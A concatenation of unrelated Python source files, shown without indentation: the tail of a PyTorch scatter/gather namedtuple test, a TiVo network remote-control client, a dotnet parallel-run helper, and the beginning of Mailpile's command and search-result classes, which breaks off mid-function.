scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=0)
a_tensors_for_gpu = [a[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
b_tensors_for_gpu = [b[2 * i : 2 * i + 2].to(i) for i in range(num_gpus)]
inp = TestNamedTupleInput_1(a, b)
scatter_out = scatter_gather.scatter(inp, target_gpus)
for i, x in enumerate(scatter_out):
self.assertTrue(isinstance(x, type(inp)))
self.assertEqual(x._fields, fields)
expected_a = a_tensors_for_gpu[i]
expected_b = b_tensors_for_gpu[i]
self.assertEqual(expected_a, x.a)
self.assertEqual(expected_b, x.b)
@unittest.skipIf(not TEST_MULTIGPU, "Test needs multiple GPUs")
def test_gather_namedtuple(self):
# tests ability to gather a list of namedtuples and return a namedtuple where each
# element is of the expected tensor type.
fields = ['a', 'b']
TestNamedTupleInput_0 = collections.namedtuple('NamedTuple', fields)
num_gpus = torch.cuda.device_count()
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_0(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_0(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1]))) # x must be a tensor
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
class TestNamedTupleInput_1(NamedTuple):
a: torch.tensor
b: torch.tensor
a = torch.rand(num_gpus * 2, device=0)
b = torch.rand(num_gpus * 2, device=1)
out1 = TestNamedTupleInput_1(a, b)
a = torch.rand(num_gpus * 2, device=1)
b = torch.rand(num_gpus * 2, device=0)
out2 = TestNamedTupleInput_1(a, b)
outputs = [out1, out2]
out = scatter_gather.gather(outputs, 0) # test on GPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to(0), outputs[1][i].to(0)))
self.assertTrue(torch.equal(x, cat))
out = scatter_gather.gather(outputs, 'cpu') # test on CPU
for i, x in enumerate(out):
self.assertTrue(isinstance(x, type(out2[-1])))
cat = torch.cat((outputs[0][i].to('cpu'), outputs[1][i].to('cpu')))
self.assertTrue(torch.equal(x, cat))
if __name__ == '__main__':
run_tests()
|
connection.py
|
import logging
import socket
import select
import threading
import time
from . import const
from . import response
class TiVoError(Exception):
pass
class TiVoSocketError(Exception):
pass
class ThreadedSocket(object):
def __init__(self, host, port):
self._host = host
self._port = port
self._data = b""
self._timeoutLock = threading.Lock()
self._timeout = None
self._connect()
def send(self, data):
self._sock.sendall(data)
def wait(self, timeout = 0):
self._timeoutLock.acquire()
self._timeout = time.time() + timeout
self._timeoutLock.release()
self._recvThread.join()
return self._data
def _connect(self):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.settimeout(10)
self._sock.connect((self._host, self._port))
self._sock.setblocking(0)
self._recvThread = threading.Thread(target = self._receive)
self._recvThread.start()
def _receive(self):
while True:
try:
self._timeoutLock.acquire()
timeout = self._timeout
self._timeoutLock.release()
if timeout and time.time() >= timeout:
raise TimeoutError()
ready = select.select([self._sock], [], [], 0.5)
if ready[0]:
data = self._sock.recv(4096)
self._data += data
except:
self._sock.close()
return False
class TiVoConnection(object):
def __init__(self, host, port):
self._host = host
self._port = port
self._sendCommandsLock = threading.Lock()
def sendCommands(self, commands):
try:
self._sendCommandsLock.acquire()
sock = ThreadedSocket(self._host, self._port)
if len(commands) > 0:
# Leave some time to receive the first message before sending anything
time.sleep(0.1)
for command in commands:
if command.startswith("WAIT "):
try:
timeToSleep = float(command[5:])
time.sleep(timeToSleep)
except ValueError:
pass
else:
fullCommand = command + "\r"
sock.send(fullCommand.encode("utf-8"))
time.sleep(0.1)
allData = sock.wait(1.0)
if len(allData) == 0:
return []
allData = allData.decode("utf-8")
allResponses = allData.split("\r")
allResponses = filter(None, allResponses)
parsedResponses = list(map(self._parseResponse, allResponses))
return parsedResponses
except:
raise TiVoSocketError()
finally:
self._sendCommandsLock.release()
@staticmethod
def _readFromSocket(sock, timeout):
allData = b""
begin = time.time()
while True and time.time() - begin < timeout:
ready = select.select([sock], [], [], timeout)
print("Ready {}".format(ready))
if ready[0]:
data = sock.recv(4096)
allData += data
else:
break
return allData
def fetchOnState(self):
responses = self.sendCommands([])
return len(responses) > 0
def setOnState(self, state):
on = self.fetchOnState()
if on == state:
return
commands = None
if state:
commands = ["IRCODE STANDBY"]
else:
commands = ["IRCODE STANDBY", const.SpecialCommand.WAIT(0.5), "IRCODE STANDBY"]
self.sendCommands(commands)
def fetchCurrentChannel(self):
responses = self.sendCommands([])
if len(responses) == 0:
return None
lastResponse = responses[0]
return response.FullChannelName(lastResponse)
def setChannel(self, channel):
responses = self.sendCommands(["SETCH " + channel])
if len(responses) == 0:
return False
lastResponse = responses[-1]
if not response.IsChannelStatus(lastResponse):
return False
return lastResponse["channel"] == channel.zfill(4)
def forceChannel(self, channel):
responses = self.sendCommands(["FORCECH " + channel])
if len(responses) == 0:
return False
lastResponse = responses[-1]
if not response.IsChannelStatus(lastResponse):
return False
return lastResponse["channel"] == channel.zfill(4)
def sendIRCode(self, code):
return self.sendCommands(["IRCODE " + code])
def sendKeyboard(self, code):
return self.sendCommands(["KEYBOARD " + code])
def sendTeleport(self, code):
return self.sendCommands(["TELEPORT " + code])
@staticmethod
def _parseResponse(message):
split = message.split(" ")
type = split[0]
response = {
"raw": message,
"type": type
}
if type == const.ResponseType.CH_STATUS:
response["channel"] = split[1]
response["reason"] = split[-1]
response["subChannel"] = split[2] if len(split) == 4 else None
elif type == const.ResponseType.CH_FAILED:
response["reason"] = split[1]
return response
|
services.py
|
"""
Execute dotnet projects in parallel separate processes
"""
import glob
import shlex
import subprocess
from multiprocessing import Process
from os import path
from typing import List
from .printing import print_green
def run(project: str, command_type: str, watch_mode: bool):
"""Execute dotnet command
Arguments:
project {str} -- project name
command_type {str} -- [run, test, restore, build, clean]
watch_mode {bool} -- watch code changes
"""
command: List[str] = []
if command_type in ['run']:
command = shlex.split(f'dotnet {command_type} -p {project}')
if watch_mode:
command = shlex.split(f'dotnet watch -p {project} {command_type}')
else:
command = shlex.split(f'dotnet {command_type} {project}')
process = subprocess.Popen(command)
process.communicate(input=None)
def start_service(
working_directory: str,
service_name: str,
command: str,
watch_mode: bool,
) -> None:
"""Start process container
Arguments:
working_directory {str} -- path to the projects
command {str} -- [run, test, restore, build, clean]
watch_mode {bool} -- watch code changes
args {[str]} -- projects name (full/partial)
"""
repo_path = path.join(working_directory, service_name)
all_pros = list(glob.iglob(f'{repo_path}/**/*.csproj', recursive=True))
test_projects = [
pro for pro in all_pros
if 'test' in pro.lower()
]
runnable_projects = [
pro for pro in all_pros
if 'test' not in pro.lower()
]
exec_pros: List[str] = []
if command == 'test':
exec_pros = test_projects
else:
exec_pros = runnable_projects
for project in exec_pros:
print_green(project)
job = Process(target=run, args=(project, command, watch_mode))
job.start()
|
commands.py
|
# These are the Mailpile commands, the public "API" we expose for searching,
# tagging and editing e-mail.
#
import copy
import datetime
import json
import os
import os.path
import random
import re
import shlex
import socket
import subprocess
import sys
import traceback
import threading
import time
import unicodedata
import webbrowser
import mailpile.util
import mailpile.ui
import mailpile.postinglist
from mailpile.crypto.gpgi import GnuPG
from mailpile.eventlog import Event
from mailpile.i18n import gettext as _
from mailpile.i18n import ngettext as _n
from mailpile.mailboxes import IsMailbox
from mailpile.mailutils import AddressHeaderParser, ClearParseCache
from mailpile.mailutils import ExtractEmails, ExtractEmailAndName, Email
from mailpile.postinglist import GlobalPostingList
from mailpile.safe_popen import MakePopenUnsafe, MakePopenSafe
from mailpile.search import MailIndex
from mailpile.util import *
from mailpile.vcard import AddressInfo
class Command(object):
"""Generic command object all others inherit from"""
SYNOPSIS = (None, # CLI shortcode, e.g. A:
None, # CLI shortname, e.g. add
None, # API endpoint, e.g. sys/addmailbox
None) # Positional argument list
SYNOPSIS_ARGS = None # New-style positional argument list
API_VERSION = None
UI_CONTEXT = None
IS_USER_ACTIVITY = False
IS_HANGING_ACTIVITY = False
IS_INTERACTIVE = False
CONFIG_REQUIRED = True
COMMAND_CACHE_TTL = 0 # < 1 = Not cached
CHANGES_SESSION_CONTEXT = False
FAILURE = 'Failed: %(name)s %(args)s'
ORDER = (None, 0)
SPLIT_ARG = True # Uses shlex by default
RAISES = (UsageError, UrlRedirectException)
WITH_CONTEXT = ()
# Event logging settings
LOG_NOTHING = False
LOG_ARGUMENTS = True
LOG_PROGRESS = False
LOG_STARTING = '%(name)s: Starting'
LOG_FINISHED = '%(name)s: %(message)s'
# HTTP settings (note: security!)
HTTP_CALLABLE = ('GET', )
HTTP_POST_VARS = {}
HTTP_QUERY_VARS = {}
HTTP_BANNED_VARS = {}
HTTP_STRICT_VARS = True
HTTP_AUTH_REQUIRED = True
class CommandResult:
def __init__(self, command_obj, session,
command_name, doc, result, status, message,
template_id=None, kwargs={}, error_info={}):
self.session = session
self.command_obj = command_obj
self.command_name = command_name
self.kwargs = {}
self.kwargs.update(kwargs)
self.template_id = template_id
self.doc = doc
self.result = result
self.status = status
self.error_info = {}
self.error_info.update(error_info)
self.message = message
self.rendered = {}
self.renderers = {
'json': self.as_json,
'html': self.as_html,
'text': self.as_text,
'css': self.as_css,
'rss': self.as_rss,
'xml': self.as_xml,
'txt': self.as_txt,
'js': self.as_js
}
def __nonzero__(self):
return (self.result and True or False)
def as_(self, what, *args, **kwargs):
if args or kwargs:
# Args render things un-cacheable.
return self.renderers.get(what)(*args, **kwargs)
if what not in self.rendered:
self.rendered[what] = self.renderers.get(what, self.as_text)()
return self.rendered[what]
def as_text(self):
if isinstance(self.result, bool):
happy = '%s: %s' % (self.result and _('OK') or _('Failed'),
self.message or self.doc)
if not self.result and self.error_info:
return '%s\n%s' % (happy,
json.dumps(self.error_info, indent=4,
default=mailpile.util.json_helper))
else:
return happy
elif isinstance(self.result, (dict, list, tuple)):
return json.dumps(self.result, indent=4, sort_keys=True,
default=mailpile.util.json_helper)
else:
return unicode(self.result)
__str__ = lambda self: self.as_text()
__unicode__ = lambda self: self.as_text()
def as_dict(self):
from mailpile.urlmap import UrlMap
rv = {
'command': self.command_name,
'state': {
'command_url': UrlMap.ui_url(self.command_obj),
'context_url': UrlMap.context_url(self.command_obj),
'query_args': self.command_obj.state_as_query_args(),
'cache_id': self.command_obj.cache_id(),
'context': self.command_obj.context or ''
},
'status': self.status,
'message': self.message,
'result': self.result,
'event_id': self.command_obj.event.event_id,
'elapsed': '%.3f' % self.session.ui.time_elapsed,
}
if self.error_info:
rv['error'] = self.error_info
for ui_key in [k for k in self.kwargs.keys()
if k.startswith('ui_')]:
rv[ui_key] = self.kwargs[ui_key]
return rv
def as_json(self):
return self.session.ui.render_json(self.as_dict())
def as_html(self, template=None):
return self.as_template('html', template)
def as_js(self, template=None):
return self.as_template('js', template)
def as_css(self, template=None):
return self.as_template('css', template)
def as_rss(self, template=None):
return self.as_template('rss', template)
def as_xml(self, template=None):
return self.as_template('xml', template)
def as_txt(self, template=None):
return self.as_template('txt', template)
def as_template(self, etype, template=None):
what = ''.join((etype, '/' if template else '', template or ''))
for e in ('jhtml', 'jjs', 'jcss', 'jxml', 'jrss'):
if self.session.ui.render_mode.endswith(e):
what += ':content'
if what in self.rendered:
return self.rendered[what]
tpath = self.command_obj.template_path(
etype, template_id=self.template_id, template=template)
data = self.as_dict()
data['title'] = self.message
def render():
return self.session.ui.render_web(
self.session.config, [tpath], data)
if what.endswith(':content'):
data['render_mode'] = 'content'
data['result'] = render()
self.rendered[what] = self.session.ui.render_json(data)
else:
data['render_mode'] = 'full'
self.rendered[what] = render()
return self.rendered[what]
def __init__(self, session, name=None, arg=None, data=None, async=False):
self.session = session
self.context = None
self.name = self.SYNOPSIS[1] or self.SYNOPSIS[2] or name
self.data = data or {}
self.status = 'unknown'
self.message = name
self.error_info = {}
self.result = None
self.run_async = async
if type(arg) in (type(list()), type(tuple())):
self.args = tuple(arg)
elif arg:
if self.SPLIT_ARG is True:
try:
self.args = tuple([a.decode('utf-8') for a in
shlex.split(arg.encode('utf-8'))])
except (ValueError, UnicodeEncodeError, UnicodeDecodeError):
raise UsageError(_('Failed to parse arguments'))
else:
self.args = (arg, )
else:
self.args = tuple([])
if 'arg' in self.data:
self.args = tuple(list(self.args) + self.data['arg'])
self._create_event()
def state_as_query_args(self):
args = {}
if self.args:
args['arg'] = self._sloppy_copy(self.args)
args.update(self._sloppy_copy(self.data))
return args
def cache_id(self, sqa=None):
if self.COMMAND_CACHE_TTL < 1:
return ''
from mailpile.urlmap import UrlMap
args = sorted(list((sqa or self.state_as_query_args()).iteritems()))
# The replace() stuff makes these usable as CSS class IDs
return ('%s-%s' % (UrlMap.ui_url(self), md5_hex(str(args)))
).replace('/', '-').replace('.', '-')
def cache_requirements(self, result):
raise NotImplementedError('Cachable commands should override this, '
'returning a set() of requirements.')
def cache_result(self, result):
if self.COMMAND_CACHE_TTL > 0:
try:
cache_id = self.cache_id()
if cache_id:
self.session.config.command_cache.cache_result(
cache_id,
time.time() + self.COMMAND_CACHE_TTL,
self.cache_requirements(result),
self,
result)
self.session.ui.mark(_('Cached result as %s') % cache_id)
except (ValueError, KeyError, TypeError, AttributeError):
self._ignore_exception()
def template_path(self, etype, template_id=None, template=None):
path_parts = (template_id or self.SYNOPSIS[2] or 'command').split('/')
if len(path_parts) == 1:
path_parts.append('index')
if template not in (None, etype, 'as.' + etype):
# Security: The template request may come from the URL, so we
# sanitize it very aggressively before heading off
# to the filesystem.
clean_tpl = CleanText(template.replace('.%s' % etype, ''),
banned=(CleanText.FS +
CleanText.WHITESPACE))
path_parts[-1] += '-%s' % clean_tpl
path_parts[-1] += '.' + etype
return os.path.join(*path_parts)
def _gnupg(self):
return GnuPG(self.session.config)
def _config(self):
session, config = self.session, self.session.config
if not config.loaded_config:
config.load(session)
parent = session
config.prepare_workers(session, daemons=self.IS_INTERACTIVE)
if self.IS_INTERACTIVE and not config.daemons_started():
config.prepare_workers(session, daemons=True)
return config
def _idx(self, reset=False, wait=True, wait_all=True, quiet=False):
session, config = self.session, self._config()
if not reset and config.index:
return config.index
def __do_load2():
config.vcards.load_vcards(session)
if not wait_all:
session.ui.report_marks(quiet=quiet)
def __do_load1():
with config.interruptable_wait_for_lock():
if reset:
config.index = None
session.results = []
session.searched = []
session.displayed = None
idx = config.get_index(session)
if wait_all:
__do_load2()
if not wait:
session.ui.report_marks(quiet=quiet)
return idx
if wait:
rv = __do_load1()
session.ui.reset_marks(quiet=quiet)
else:
config.save_worker.add_task(session, 'Load', __do_load1)
rv = None
if not wait_all:
config.save_worker.add_task(session, 'Load2', __do_load2)
return rv
def _background_save(self,
everything=False, config=False,
index=False, index_full=False,
wait=False, wait_callback=None):
session, cfg = self.session, self.session.config
aut = cfg.save_worker.add_unique_task
if everything or config:
aut(session, 'Save config', lambda: cfg.save(session))
if cfg.index:
cfg.flush_mbox_cache(session, clear=False, wait=wait)
if index_full:
aut(session, 'Save index', lambda: self._idx().save(session))
elif everything or index:
aut(session, 'Save index changes',
lambda: self._idx().save_changes(session))
if wait:
wait_callback = wait_callback or (lambda: True)
cfg.save_worker.do(session, 'Waiting', wait_callback)
def _choose_messages(self, words, allow_ephemeral=False):
msg_ids = set()
all_words = []
for word in words:
all_words.extend(word.split(','))
for what in all_words:
if what.lower() == 'these':
if self.session.displayed:
b = self.session.displayed['stats']['start'] - 1
c = self.session.displayed['stats']['count']
msg_ids |= set(self.session.results[b:b + c])
else:
self.session.ui.warning(_('No results to choose from!'))
elif what.lower() == 'all':
if self.session.results:
msg_ids |= set(self.session.results)
else:
self.session.ui.warning(_('No results to choose from!'))
elif what.startswith('='):
try:
msg_id = int(what[1:], 36)
if msg_id >= 0 and msg_id < len(self._idx().INDEX):
msg_ids.add(msg_id)
else:
self.session.ui.warning((_('No such ID: %s')
) % (what[1:], ))
except ValueError:
if allow_ephemeral and '-' in what:
msg_ids.add(what[1:])
else:
self.session.ui.warning(_('What message is %s?'
) % (what, ))
elif '-' in what:
try:
b, e = what.split('-')
msg_ids |= set(self.session.results[int(b) - 1:int(e)])
except (ValueError, KeyError, IndexError, TypeError):
self.session.ui.warning(_('What message is %s?'
) % (what, ))
else:
try:
msg_ids.add(self.session.results[int(what) - 1])
except (ValueError, KeyError, IndexError, TypeError):
self.session.ui.warning(_('What message is %s?'
) % (what, ))
return msg_ids
def _error(self, message, info=None, result=None):
self.status = 'error'
self.message = message
ui_message = _('%s error: %s') % (self.name, message)
if info:
self.error_info.update(info)
details = ' '.join(['%s=%s' % (k, info[k]) for k in info])
ui_message += ' (%s)' % details
self.session.ui.mark(self.name)
self.session.ui.error(ui_message)
if result:
return self.view(result)
else:
return False
def _success(self, message, result=True):
self.status = 'success'
self.message = message
ui_message = '%s: %s' % (self.name, message)
self.session.ui.mark(ui_message)
return self.view(result)
def _read_file_or_data(self, fn):
if fn in self.data:
return self.data[fn]
else:
return open(fn, 'rb').read()
def _ignore_exception(self):
self.session.ui.debug(traceback.format_exc())
def _serialize(self, name, function):
return function()
def _background(self, name, function):
session, config = self.session, self.session.config
return config.slow_worker.add_task(session, name, function)
def _update_event_state(self, state, log=False):
self.event.flags = state
self.event.data['elapsed'] = int(1000 * (time.time()-self._start_time))
if (log or self.LOG_PROGRESS) and not self.LOG_NOTHING:
self.event.data['ui'] = str(self.session.ui.__class__.__name__)
self.event.data['output'] = self.session.ui.render_mode
if self.session.config.event_log:
self.session.config.event_log.log_event(self.event)
def _starting(self):
self._start_time = time.time()
self._update_event_state(Event.RUNNING)
if self.name:
self.session.ui.start_command(self.name, self.args, self.data)
def _fmt_msg(self, message):
return message % {'name': self.name,
'status': self.status or '',
'message': self.message or ''}
def _sloppy_copy(self, data, name=None):
if name and 'pass' == name[:4]:
data = '(SUPPRESSED)'
def copy_value(v):
try:
unicode(v).encode('utf-8')
return unicode(v)[:1024]
except (UnicodeEncodeError, UnicodeDecodeError):
return '(BINARY DATA)'
if isinstance(data, (list, tuple)):
return [self._sloppy_copy(i, name=name) for i in data]
elif isinstance(data, dict):
return dict((k, self._sloppy_copy(v, name=k))
for k, v in data.iteritems())
else:
return copy_value(data)
def _create_event(self):
private_data = {}
if self.LOG_ARGUMENTS:
if self.data:
private_data['data'] = self._sloppy_copy(self.data)
if self.args:
private_data['args'] = self._sloppy_copy(self.args)
self.event = self._make_command_event(private_data)
def _make_command_event(self, private_data):
return Event(source=self,
message=self._fmt_msg(self.LOG_STARTING),
flags=Event.INCOMPLETE,
data={},
private_data=private_data)
def _finishing(self, rv, just_cleanup=False):
if just_cleanup:
self._update_finished_event()
return rv
if not self.context:
self.context = self.session.get_context(
update=self.CHANGES_SESSION_CONTEXT)
self.session.ui.mark(_('Generating result'))
result = self.CommandResult(self, self.session, self.name,
self.__doc__,
rv, self.status, self.message,
error_info=self.error_info)
self.cache_result(result)
if not self.run_async:
self._update_finished_event()
self.session.last_event_id = self.event.event_id
return result
def _update_finished_event(self):
# Update the event!
if self.message:
self.event.message = self.message
if self.error_info:
self.event.private_data['error_info'] = self.error_info
self.event.message = self._fmt_msg(self.LOG_FINISHED)
self._update_event_state(Event.COMPLETE, log=True)
self.session.ui.mark(self.event.message)
self.session.ui.report_marks(
details=('timing' in self.session.config.sys.debug))
if self.name:
self.session.ui.finish_command(self.name)
def _run_sync(self, enable_cache, *args, **kwargs):
try:
self._starting()
self._run_args = args
self._run_kwargs = kwargs
if (self.COMMAND_CACHE_TTL > 0 and
'http' not in self.session.config.sys.debug and
enable_cache):
cid = self.cache_id()
try:
rv = self.session.config.command_cache.get_result(cid)
rv.session.ui = self.session.ui
if self.CHANGES_SESSION_CONTEXT:
self.session.copy(rv.session, ui=False)
self.session.ui.mark(_('Using pre-cached result object %s') % cid)
self._finishing(True, just_cleanup=True)
return rv
except:
pass
def command(self, *args, **kwargs):
if self.CONFIG_REQUIRED:
if not self.session.config.loaded_config:
return self._error(_('Please log in'))
if mailpile.util.QUITTING:
return self._error(_('Shutting down'))
return self.command(*args, **kwargs)
return self._finishing(command(self, *args, **kwargs))
except self.RAISES:
self.status = 'success'
self._finishing(True, just_cleanup=True)
raise
except:
self._ignore_exception()
self._error(self.FAILURE % {'name': self.name,
'args': ' '.join(self.args)})
return self._finishing(False)
def _run(self, *args, **kwargs):
if self.run_async:
def streetcar():
try:
with MultiContext(self.WITH_CONTEXT):
rv = self._run_sync(True, *args, **kwargs).as_dict()
self.event.private_data.update(rv)
self._update_finished_event()
except:
traceback.print_exc()
self._starting()
self._update_event_state(self.event.RUNNING, log=True)
result = Command.CommandResult(self, self.session, self.name,
self.__doc__,
{"resultid": self.event.event_id},
"success",
"Running in background")
self.session.config.async_worker.add_task(self.session, self.name,
streetcar)
return result
else:
return self._run_sync(True, *args, **kwargs)
def run(self, *args, **kwargs):
with MultiContext(self.WITH_CONTEXT):
if self.IS_USER_ACTIVITY:
try:
mailpile.util.LAST_USER_ACTIVITY = time.time()
mailpile.util.LIVE_USER_ACTIVITIES += 1
return self._run(*args, **kwargs)
finally:
mailpile.util.LIVE_USER_ACTIVITIES -= 1
else:
return self._run(*args, **kwargs)
def refresh(self):
self._create_event()
return self._run_sync(False, *self._run_args, **self._run_kwargs)
def command(self):
return None
def etag_data(self):
return []
def max_age(self):
return 0
@classmethod
def view(cls, result):
return result
##[ Shared basic Search Result class]#########################################
class SearchResults(dict):
_NAME_TITLES = ('the', 'mr', 'ms', 'mrs', 'sir', 'dr', 'lord')
def _name(self, sender, short=True, full_email=False):
words = re.sub('["<>]', '', sender).split()
nomail = [w for w in words if not '@' in w]
if nomail:
if short:
if len(nomail) > 1 and nomail[0].lower() in self._NAME_TITLES:
return nomail[1]
return nomail[0]
return ' '.join(nomail)
elif words:
if not full_email:
return words[0].split('@', 1)[0]
return words[0]
return '(nobody)'
def _names(self, senders):
if len(senders) > 1:
names = {}
for sender in senders:
sname = self._name(sender)
names[sname] = names.get(sname, 0) + 1
namelist = names.keys()
namelist.sort(key=lambda n: -names[n])
return ', '.join(namelist)
if len(senders) < 1:
return '(no sender)'
if senders:
return self._name(senders[0], short=False)
return ''
def _compact(self, namelist, maxlen):
l = len(namelist)
while l > maxlen:
namelist = re.sub(', *[^, \.]+, *', ',,', namelist, 1)
if l == len(namelist):
break
l = len(namelist)
namelist = re.sub(',,,+, *', ' .. ', namelist, 1)
return namelist
TAG_TYPE_FLAG_MAP = {
'trash': 'trash',
'spam': 'spam',
'ham': 'ham',
'drafts': 'draft',
'blank': 'draft',
'sent': 'from_me',
'outbox': 'from_me',
'replied': 'replied',
'fwded': 'forwarded'
}
def _metadata(self, msg_info):
import mailpile.urlmap
nz = lambda l: [v for v in l if v]
msg_ts = long(msg_info[MailIndex.MSG_DATE], 36)
msg_date = datetime.datetime.fromtimestamp(msg_ts)
fe, fn = ExtractEmailAndName(msg_info[MailIndex.MSG_FROM])
f_info = self._address(e=fe, n=fn)
f_info['aid'] = (self._msg_addresses(msg_info, no_to=True, no_cc=True)
or [''])[0]
expl = {
'mid': msg_info[MailIndex.MSG_MID],
'id': msg_info[MailIndex.MSG_ID],
'timestamp': msg_ts,
'from': f_info,
'to_aids': self._msg_addresses(msg_info, no_from=True, no_cc=True),
'cc_aids': self._msg_addresses(msg_info, no_from=True, no_to=True),
'msg_kb': int(msg_info[MailIndex.MSG_KB], 36),
'tag_tids': sorted(self._msg_tags(msg_info)),
'thread_mid': msg_info[MailIndex.MSG_THREAD_MID],
'subject': msg_info[MailIndex.MSG_SUBJECT],
'body': MailIndex.get_body(msg_info),
'flags': {
},
'crypto': {
}
}
# Ephemeral messages do not have URLs
if '-' in msg_info[MailIndex.MSG_MID]:
expl['flags'].update({
'ephemeral': True,
'draft': True,
})
else:
expl['urls'] = {
'thread': self.urlmap.url_thread(msg_info[MailIndex.MSG_MID]),
'source': self.urlmap.url_source(msg_info[MailIndex.MSG_MID]),
}
# Support rich snippets
if expl['body']['snippet'].startswith('{'):
try:
expl['body'] = json.loads(expl['body']['snippet'])
except ValueError:
pass
# Misc flags
sender_vcard = self.idx.config.vcards.get_vcard(fe.lower())
if sender_vcard:
if sender_vcard.kind == 'profile':
expl['flags']['from_me'] = True
tag_types = [self.idx.config.get_tag(t).type for t in expl['tag_tids']]
for t in self.TAG_TYPE_FLAG_MAP:
if t in tag_types:
expl['flags'][self.TAG_TYPE_FLAG_MAP[t]] = True
# Check tags for signs of encryption or signatures
tag_slugs = [self.idx.config.get_tag(t).slug for t in expl['tag_tids']]
for t in tag_slugs:
if t.startswith('mp_sig'):
expl['crypto']['signature'] = t[7:]
elif t.startswith('mp_enc'):
expl['crypto']['encryption'] = t[7:]
# Extra behavior for editable messages
if 'draft' in expl['flags']:
if 'ephemeral' in expl['flags']:
pass
elif self.idx.config.is_editable_message(msg_info):
expl['urls']['editing'] = self.urlmap.url_edit(expl['mid'])
else:
del expl['flags']['draft']
return expl
def _msg_addresses(self, msg_info=None, addresses=[],
no_from=False, no_to=False, no_cc=False):
cids = set()
for ai in addresses:
try:
cids.add(b36(self.idx.EMAIL_IDS[ai.address.lower()]))
except KeyError:
cids.add(b36(self.idx._add_email(ai.address, name=ai.fn)))
if msg_info:
if not no_to:
to = [t for t in msg_info[MailIndex.MSG_TO].split(',') if t]
cids |= set(to)
if not no_cc:
cc = [t for t in msg_info[MailIndex.MSG_CC].split(',') if t]
cids |= set(cc)
if not no_from:
fe, fn = ExtractEmailAndName(msg_info[MailIndex.MSG_FROM])
if fe:
try:
cids.add(b36(self.idx.EMAIL_IDS[fe.lower()]))
except KeyError:
cids.add(b36(self.idx._add_email(fe, name=fn)))
return sorted(list(cids))
def _address(self, cid=None, e=None, n=None):
if cid and not (e and n):
e, n = ExtractEmailAndName(self.idx.EMAILS[int(cid, 36)])
vcard = self.session.config.vcards.get_vcard(e)
if vcard and '@' in n:
n = vcard.fn
return AddressInfo(e, n, vcard=vcard)
def _msg_tags(self, msg_info):
tids = [t for t in msg_info[MailIndex.MSG_TAGS].split(',')
if t and t in self.session.config.tags]
return tids
def _tag(self, tid, attributes={}):
return dict_merge(self.session.config.get_tag_info(tid), attributes)
def _thread(self, thread_mid):
msg_info = self.idx.get_msg_at_idx_pos(int(thread_mid, 36))
thread = [i for i in msg_info[MailIndex.MSG_REPLIES].split(',') if i]
# FIXME: This is a hack, the indexer should just keep things
# in the right order on rescan. Fixing threading is a bigger
# problem though, so we do this for now.
def thread_sort_key(idx):
info = self.idx.get_msg_at_idx_pos(int(thread_mid, 36))
return int(info[self.idx.MSG_DATE], 36)
thread.sort(key=thread_sort_key)
return thread
WANT_MSG_TREE = ('attachments', 'html_parts', 'text_parts', 'header_list',
'editing_strings', 'crypto')
PRUNE_MSG_TREE = ('headers', ) # Added by editing_strings
def _prune_msg_tree(self, tree):
for k in tree.keys():
if k not in self.WANT_MSG_TREE or k in self.PRUNE_MSG_TREE:
del tree[k]
return tree
def _message(self, email):
tree = email.get_message_tree(want=(email.WANT_MSG_TREE_PGP +
self.WANT_MSG_TREE))
email.evaluate_pgp(tree, decrypt=True)
editing_strings = tree.get('editing_strings')
if editing_strings:
for key in ('from', 'to', 'cc', 'bcc'):
if key in editing_strings:
cids = self._msg_addresses(
addresses=AddressHeaderParser(
unicode_data=editing_strings[key]))
editing_strings['%s_aids' % key] = cids
for cid in cids:
if cid not in self['data']['addresses']:
self['data']['addresses'
][cid] = self._address(cid=cid)
return self._prune_msg_tree(tree)
def __init__(self, session, idx,
results=None, start=0, end=None, num=None,
emails=None, people=None,
suppress_data=False, full_threads=True):
dict.__init__(self)
self.session = session
self.people = people
self.emails = emails
self.idx = idx
self.urlmap = mailpile.urlmap.UrlMap(self.session)
results = self.results = results or session.results or []
num = num or session.config.prefs.num_results
if end:
start = end - num
if start > len(results):
start = len(results)
if start < 0:
start = 0
try:
threads = [b36(r) for r in results[start:start + num]]
except TypeError:
results = threads = []
start = end = 0
self.session.ui.mark(_('Parsing metadata for %d results '
'(full_threads=%s)') % (len(threads),
full_threads))
self.update({
'summary': _('Search: %s') % ' '.join(session.searched),
'stats': {
'count': len(threads),
'start': start + 1,
'end': start + min(num, len(results)-start),
'total': len(results),
},
'search_terms': session.searched,
'address_ids': [],
'message_ids': [],
'thread_ids': threads,
})
if 'tags' in self.session.config:
search_tags = [idx.config.get_tag(t.split(':')[1], {})
for t in session.searched
if t.startswith('in:') or t.startswith('tag:')]
search_tag_ids = [t._key for t in search_tags if t]
self.update({
'search_tag_ids': search_tag_ids,
})
if search_tag_ids:
self['summary'] = ' & '.join([t.name for t
in search_tags if t])
else:
search_tag_ids = []
if suppress_data or (not results and not emails):
return
self.update({
'data': {
'addresses': {},
'metadata': {},
'messages': {},
'threads': {}
}
})
if 'tags' in self.session.config:
th = self['data']['tags'] = {}
for tid in search_tag_ids:
if tid not in th:
th[tid] = self._tag(tid, {'searched': True})
idxs = results[start:start + num]
while idxs:
idx_pos = idxs.pop(0)
msg_info = idx.get_msg_at_idx_pos(idx_pos)
